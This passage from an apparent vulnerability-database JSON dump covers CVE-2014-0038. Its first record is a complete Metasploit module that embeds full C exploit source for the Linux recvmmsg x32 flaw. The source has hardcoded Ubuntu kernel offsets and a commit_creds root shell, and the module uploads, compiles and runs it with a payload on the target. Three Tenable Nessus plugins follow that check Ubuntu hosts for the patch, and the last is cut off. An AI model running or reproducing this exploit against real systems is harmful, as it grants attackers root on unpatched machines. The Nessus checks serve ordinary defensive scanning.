"published": "2016-10-10T00:00:00", "type": "packetstorm", "title": "Linux Kernel 3.13.1 Recvmmsg Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2016-10-10T00:00:00", "id": "PACKETSTORM:139049", "href": "https://packetstormsecurity.com/files/139049/Linux-Kernel-3.13.1-Recvmmsg-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire \"msf/core\" \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linux Kernel 3.13.1 Recvmmsg Privilege Escalation', \n'Description' => %q{ \nThis module attempts to exploit CVE-2014-0038, by sending a recvmmsg \nsystem call with a crafted timeout pointer parameter to gain root. \nThis exploit has offsets for 3 Ubuntu 13 kernels built in: \n3.8.0-19-generic (13.04 default) \n3.11.0-12-generic (13.10 default) \n3.11.0-15-generic (13.10) \nThis exploit may take up to 13 minutes to run due to a decrementing (1/sec) \npointer which starts at 0xff*3 (765 seconds) \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'h00die <mike@shorebreaksecurity.com>', # Module \n'rebel' # Discovery \n], \n'DisclosureDate' => 'Feb 2 2014', \n'Platform' => [ 'linux'], \n'Arch' => [ ARCH_X86, ARCH_X86_64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ 'Auto', { } ] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { 'WfsDelay' => 780, 'PrependFork' => true, }, \n'References' => \n[ \n[ 'EDB', '31347'], \n[ 'EDB', '31346'], \n[ 'CVE', '2014-0038'], \n[ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900'] \n] \n)) \nregister_options( \n[ \nOptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) \n], self.class) \nend \n \ndef check \ndef kernel_vuln?() \nos_id = cmd_exec('grep ^ID= /etc/os-release') \nif os_id == 'ID=ubuntu' \nkernel = Gem::Version.new(cmd_exec('/bin/uname -r')) \ncase kernel.release.to_s \nwhen '3.11.0' \nif kernel == Gem::Version.new('3.11.0-15-generic') || kernel == Gem::Version.new('3.11.0-12-generic') \nvprint_good(\"Kernel #{kernel} is exploitable\") \nreturn true \nelse \nprint_error(\"Kernel #{kernel} is NOT vulnerable or NOT exploitable\") \nreturn false \nend \nwhen '3.8.0' \nif kernel == Gem::Version.new('3.8.0-19-generic') \nvprint_good(\"Kernel #{kernel} is exploitable\") \nreturn true \nelse \nprint_error(\"Kernel #{kernel} is NOT vulnerable or NOT exploitable\") \nreturn false \nend \nelse \nprint_error(\"Non-vuln kernel #{kernel}\") \nreturn false \nend \nelse \nprint_error(\"Unknown OS: #{os_id}\") \nreturn false \nend \nend \n \nif kernel_vuln?() \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \ndef exploit \n \nif check != CheckCode::Appears \nfail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') \nend \n \n \n# direct copy of code from exploit-db. I removed a lot of the comments in the title area just to cut down on size \n \nrecvmmsg = %q{ \n/* \n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* \nrecvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y) \nCVE-2014-0038 / x32 ABI with recvmmsg \nby rebel @ irc.smashthestack.org \n----------------------------------- \n*/ \n \n#define _GNU_SOURCE \n#include <netinet/ip.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <sys/socket.h> \n#include <unistd.h> \n#include <sys/syscall.h> \n#include <sys/mman.h> \n#include <sys/types.h> \n#include <sys/stat.h> \n#include <fcntl.h> \n#include <sys/utsname.h> \n \n#define __X32_SYSCALL_BIT 0x40000000 \n#undef __NR_recvmmsg \n#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537) \n#define VLEN 1 \n#define BUFSIZE 200 \n \nint port; \n \nstruct offset { \nchar *kernel_version; \nunsigned long dest; // net_sysctl_root + 96 \nunsigned long original_value; // net_ctl_permissions \nunsigned long prepare_kernel_cred; \nunsigned long commit_creds; \n}; \n \nstruct offset offsets[] = { \n{\"3.11.0-15-generic\",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10 \n{\"3.11.0-12-generic\",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10 \n{\"3.8.0-19-generic\",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04 \n{NULL,0,0,0,0} \n}; \n \nvoid udp(int b) { \nint sockfd; \nstruct sockaddr_in servaddr,cliaddr; \nint s = 0xff+1; \n \nif(fork() == 0) { \nwhile(s > 0) { \nfprintf(stderr,\"\\rbyte %d / 3.. ~%d secs left \\b\\b\\b\\b\",b+1,3*0xff - b*0xff - (0xff+1-s)); \nsleep(1); \ns--; \nfprintf(stderr,\".\"); \n} \n \nsockfd = socket(AF_INET,SOCK_DGRAM,0); \nbzero(&servaddr,sizeof(servaddr)); \nservaddr.sin_family = AF_INET; \nservaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK); \nservaddr.sin_port=htons(port); \nsendto(sockfd,\"1\",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr)); \nexit(0); \n} \n \n} \n \nvoid trigger() { \nopen(\"/proc/sys/net/core/somaxconn\",O_RDONLY); \n \nif(getuid() != 0) { \nfprintf(stderr,\"not root, ya blew it!\\n\"); \nexit(-1); \n} \n \nfprintf(stderr,\"w00p w00p!\\n\"); \nsystem(\"/bin/sh -i\"); \n} \n \ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); \ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); \n_commit_creds commit_creds; \n_prepare_kernel_cred prepare_kernel_cred; \n \n// thx bliss \nstatic int __attribute__((regparm(3))) \ngetroot(void *head, void * table) \n{ \ncommit_creds(prepare_kernel_cred(0)); \nreturn -1; \n} \n \nvoid __attribute__((regparm(3))) \ntrampoline() \n{ \nasm(\"mov $getroot, %rax; call *%rax;\"); \n} \n \nint main(void) \n{ \nint sockfd, retval, i; \nstruct sockaddr_in sa; \nstruct mmsghdr msgs[VLEN]; \nstruct iovec iovecs[VLEN]; \nchar buf[BUFSIZE]; \nlong mmapped; \nstruct utsname u; \nstruct offset *off = NULL; \n \nuname(&u); \n \nfor(i=0;offsets[i].kernel_version != NULL;i++) { \nif(!strcmp(offsets[i].kernel_version,u.release)) { \noff = &offsets[i]; \nbreak; \n} \n} \n \nif(!off) { \nfprintf(stderr,\"no offsets for this kernel version..\\n\"); \nexit(-1); \n} \n \nmmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1)); \nmmapped &= 0x000000ffffffffff; \n \nsrand(time(NULL)); \nport = (rand() % 30000)+1500; \n \ncommit_creds = (_commit_creds)off->commit_creds; \nprepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred; \n \nmmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); \n \nif(mmapped == -1) { \nperror(\"mmap()\"); \nexit(-1); \n} \n \nmemset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3); \n \nmemcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300); \n \nif(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) { \nperror(\"mprotect()\"); \nexit(-1); \n} \n \nsockfd = socket(AF_INET, SOCK_DGRAM, 0); \nif (sockfd == -1) { \nperror(\"socket()\"); \nexit(-1); \n} \n \nsa.sin_family = AF_INET; \nsa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); \nsa.sin_port = htons(port); \n \nif (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) { \nperror(\"bind()\"); \nexit(-1); \n} \n \nmemset(msgs, 0, sizeof(msgs)); \n \niovecs[0].iov_base = &buf; \niovecs[0].iov_len = BUFSIZE; \nmsgs[0].msg_hdr.msg_iov = &iovecs[0]; \nmsgs[0].msg_hdr.msg_iovlen = 1; \n \nfor(i=0;i < 3 ;i++) { \nudp(i); \nretval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i); \nif(!retval) { \nfprintf(stderr,\"\\nrecvmmsg() failed\\n\"); \n} \n} \n \nclose(sockfd); \nfprintf(stderr,\"\\n\"); \ntrigger(); \n} \n} \n \nfilename = rand_text_alphanumeric(8) \nexecutable_path = \"#{datastore['WritableDir']}/#{filename}\" \npayloadname = rand_text_alphanumeric(8) \npayload_path = \"#{datastore['WritableDir']}/#{payloadname}\" \n \ndef has_prereqs?() \ngcc = cmd_exec('which gcc') \nif gcc.include?('gcc') \nvprint_good('gcc is installed') \nelse \nprint_error('gcc is not installed. Compiling will fail.') \nend \nreturn gcc.include?('gcc') \nend \n \ncompile = false \nif datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' \nif has_prereqs?() \ncompile = true \nvprint_status('Live compiling exploit on system') \nelse \nvprint_status('Dropping pre-compiled exploit on system') \nend \nend \nif check != CheckCode::Appears \nfail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') \nend \n \ndef upload_and_chmod(fname,fcontent) \nprint_status \"Writing to #{fname} (#{fcontent.size} bytes)\" \nrm_f fname \nwrite_file(fname, fcontent) \ncmd_exec(\"chmod +x #{fname}\") \nregister_file_for_cleanup(fname) \nend \n \nif compile \nrecvmmsg.gsub!(/system\\(\"\\/bin\\/sh -i\"\\);/, \n\"system(\\\"#{payload_path}\\\");\") \nupload_and_chmod(\"#{executable_path}.c\", recvmmsg) \nvprint_status(\"Compiling #{executable_path}.c\") \ncmd_exec(\"gcc -o #{executable_path} #{executable_path}.c\") #compile \nregister_file_for_cleanup(executable_path) \nelse \npath = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', 'recvmmsg') \nfd = ::File.open( path, \"rb\") \nrecvmmsg = fd.read(fd.stat.size) \nfd.close \nupload_and_chmod(executable_path, recvmmsg) \n# overwrite with the hardcoded variable names in the compiled versions \npayload_filename = 'a0RwAacU' \npayload_path = \"/tmp/#{payload_filename}\" \nend \n \nupload_and_chmod(payload_path, generate_payload_exe) \nstime = Time.now \nvprint_status(\"Exploiting... May take 13min. Start time: #{stime}\") \noutput = cmd_exec(executable_path) \noutput.each_line { |line| vprint_status(line.chomp) } \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139049/recvmmsg_priv_esc.rb.txt", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2022-06-22T16:13:58", "description": "Pageexec reported a bug in the Linux kernel's recvmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-01-31T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS : linux-lts-raring vulnerability (USN-2094-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2094-1.NASL", "href": "https://www.tenable.com/plugins/nessus/72233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2094-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72233);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0038\");\n script_xref(name:\"USN\", value:\"2094-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-raring vulnerability (USN-2094-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pageexec reported a bug in the Linux kernel's recvmsg syscall when\ncalled from code using the x32 ABI. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash) or gain\nadministrator privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2094-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.8-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-0038\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2094-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.8.0-35-generic\", pkgver:\"3.8.0-35.52~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.8-generic\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:51:13", "description": "Pageexec reported a bug in the Linux kernel's recvmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-01-31T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS : linux-lts-saucy vulnerability (USN-2095-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.11-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.11-generic-lpae", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2095-1.NASL", "href": "https://www.tenable.com/plugins/nessus/72234", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2095-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72234);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0038\");\n script_xref(name:\"USN\", value:\"2095-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-saucy vulnerability (USN-2095-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pageexec reported a bug in the Linux kernel's recvmsg syscall when\ncalled from code using the x32 ABI. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash) or gain\nadministrator privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2095-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.11-generic and / or\nlinux-image-3.11-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.11-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.11-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-0038\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2095-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.11.0-15-generic\", pkgver:\"3.11.0-15.25~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.11.0-15-generic-lpae\", pkgver:\"3.11.0-15.25~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.11-generic / linux-image-3.11-generic-lpae\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-20T14:26:25", "description": "Pageexec reported a bug in the Linux kernel's recvmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-01-31T00:00:00", "type": "nessus", "title": "Ubuntu 13.10 : linux vulnerability (USN-2096-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.11-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.11-generic-lpae", "cpe:/o:canonical:ubuntu_linux:13.10"], "id": "UBUNTU_USN-2096-1.NASL", "href": "https://www.tenable.com/plugins/nessus/72235", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2096-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72235);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0038\");\n script_xref(name:\"USN\", value:\"2096-1\");\n\n script_name(english:\"Ubuntu 13.10 : linux vulnerability (USN-2096-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pageexec reported a bug in the Linux kernel's recvmsg syscall when\ncalled from code using the x32 ABI. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash) or gain\nadministrator privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2096-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.11-generic and / or\nlinux-image-3.11-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.11-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.11-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:13.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(13\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 13.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-0038\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2096-1\");\n }\n else\n {\n _ubuntu_report = 